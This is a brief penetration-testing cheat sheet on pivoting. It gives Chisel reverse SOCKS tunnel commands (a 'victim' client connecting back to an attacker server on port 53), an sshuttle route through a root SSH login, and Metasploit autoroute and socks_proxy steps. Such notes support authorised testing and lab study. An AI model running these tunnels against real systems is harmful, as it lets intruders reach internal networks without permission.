Pivoting

Chisel - Socks_Proxy

  • Attacker

./chisel server --reverse --port 53
  • Victim

.\chisel.exe client 192.168.1.2:53 R:1080:socks

SShuttle

sshuttle -r root@10.10.110.1 172.16.1.0/24 --ssh-cmd 'ssh -i /root/Downloads/test.key' -x 10.10.110.1

Metasploit

use post/multi/manage/autoroute
set session x
run

use auxiliary/server/socks_proxy
run

or

use socks_proxy
set srvhost 127.0.0.1
run

use autoroute
set session 1
run

Last updated